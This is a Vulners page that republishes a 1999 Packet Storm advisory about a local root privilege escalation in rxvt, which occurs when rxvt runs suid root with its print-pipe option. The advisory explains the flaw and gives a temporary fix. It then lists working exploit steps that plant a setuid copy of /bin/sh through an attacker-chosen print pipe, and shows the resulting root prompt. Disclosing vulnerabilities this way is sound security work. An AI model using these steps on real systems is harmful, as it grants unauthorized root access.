Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

rxvt.sh

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

rxvt has a security flaw when running suid root, allowing easy root privilege escalation.

Code
` There is a major security hole in rxvt, a terminal emulator for X, when it  
is run on systems suid root, as is required on many configurations in order to  
write to the utmp file. It is obvious from the code that this program was  
not written to be run suid root, its a pity that sysadmins that install the  
compiled versions of this sort of code don't see the same warnings of 'run   
suid root at your own risk' that the people that put together a distribution  
with it that way see in the makefile.  
The conditions that allow this particular hole to be exploited is rxvt  
compiled with the PRINT_PIPE option, and is running suid root. The program  
sets the pipe to "lpr", without a pathname, but its even easier than that  
to exploit because we can set the pipe to whatever we want with the -print-pipe  
option on the rxvt command line. Although the programs gives up its root   
privileges when forking to runn a shell or other command, the original program  
continues running suid root the entire execution of the program.  
Because the popen() call runs as root, whatever program that pipe opens  
will execute immediately as root. In order to start the printer pipe, the  
vt100 printer-on command is ESC[5i. The pipe can then be closed with the  
printer-off commad, ESC[4i. Exploiting this is extremely easy.  
  
Program: rxvt   
Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with  
rxvt suid root (and compiled with PRINT_PIPE)  
Requirements: account on system, X server   
Temporary Patch: chmod -s /usr/X11R6/bin/rxvt  
Security Compromise: root  
Author: Dave M. ([email protected])  
Synopsis: rxvt fails to give up root privileges before  
opening a pipe to a program that can be specified  
by the user.  
  
  
Exploit:  
1. Set DISPLAY environment variable if necessary so you can use x clients.  
2. In user shell:  
$ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug  
$ chmod +x /tmp/rxbug  
$ rxvt -print-pipe /tmp/rxbug  
3. In rxvt xclient:  
$ cat  
ESC[5i  
ESC[4i  
(The client will close at this point with a broken pipe)  
4. $ /tmp/rxsh  
# whoami  
root  
#  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
rxvt security flawsuid root vulnerabilityprint pipe exploitationroot privilege escalationlinux slackwareredhattemporary patchx server requirement.
19